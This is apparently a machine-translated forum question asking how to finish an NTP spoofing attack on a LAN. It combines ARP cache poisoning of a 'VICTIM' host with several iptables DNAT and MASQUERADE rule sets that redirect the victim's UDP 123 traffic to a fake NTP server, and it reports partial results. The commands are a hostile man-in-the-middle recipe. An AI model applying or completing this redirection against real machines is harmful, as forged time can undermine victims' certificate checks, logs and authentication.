配置
ipv4.forwarding 1(开启)
VICTIM 与 DG 之间的 arp_cache_poisoning。(192.168.1.100 和 192.168.1.1)
**LAN**
VICTIM: 192.168.1.100
ATTACKER: 192.168.1.105
DEFAULT GATEAWAY: 192.168.1.1
**WAN**
NTP SERVERS: 17.253.52.125
17.253.52.253
17.253.34.125
17.253.34.125
NTPv4 协议的正常行为
MAC 计算机向 Apple 的 NTP 服务器(NTP 池)之一发送 NTPv4 请求。作为回复,它会获得 NTPv4 响应更新时间。更新时间的频率为 15 分钟。由于 NTPv4 默认没有任何安全检查,因此容易受到重放攻击。
恶意行为
攻击者运行 MITM 并窃听流量,直到收到受害者的 NTPv4 请求。收到请求后,必须将其重定向到攻击者机器上运行的假 NTP 服务器,然后它用假时间回复受害者,以便更新其时间。
问题
可以使用 iptables 来实现。我之所以这么说,是因为它以前也做过,而且对我来说很管用。但是,我丢失了配置。现在的情况是我尝试运行几个不同的 iptables 设置,例如:
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -j MASQUERADE
发现
我的日志 NTP 服务器显示以下日志:
发送至 192.168.1.100:55321 发送至 192.168.1.199:54623
这表明 NTP 请求被重定向到 FAKE NTP 服务器。然而,FAKE NTP 回复并没有像预期的那样传递给受害者。
另一个捕获来自 Wireshark 嗅探器。
它表明受害者通过攻击者的机器向苹果的 NTP 服务器发送 NTPv4 请求,并通过攻击者的主机从同一个苹果的 NTP 服务器收到 NTPv4 响应。
我的尝试
尝试:1。
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -A OUTPUT -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
***备注:第一个小时(15 分钟 + 15 + 15 + 15)它没有工作,所以我决定把它放一晚。当我 7 小时后回来时,它似乎按预期更新了时间。这很不寻常,肯定出了问题。对我来说,似乎假 NTP 服务器在更新 Apple NTP 服务器的 NTP 响应方面赢得了胜利。
尝试:2。
我尝试运行以下命令:
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -A INPUT -s 17.253.0.0/16 -p udp -j DROP
***注意它根本不起作用,甚至来自 Apple NTP 服务器响应的传入 NTP 流量也没有被阻止。
最后,我尝试了许多使用 iptables 的不同方案,并寻求你们的帮助,将我的假 NTP 响应包发送给受害者的机器,以便它从我的假 NTP 服务器获取时间更新,而不是使用 iptables 从 Apple 的 NTP 池获取时间更新。
先感谢您!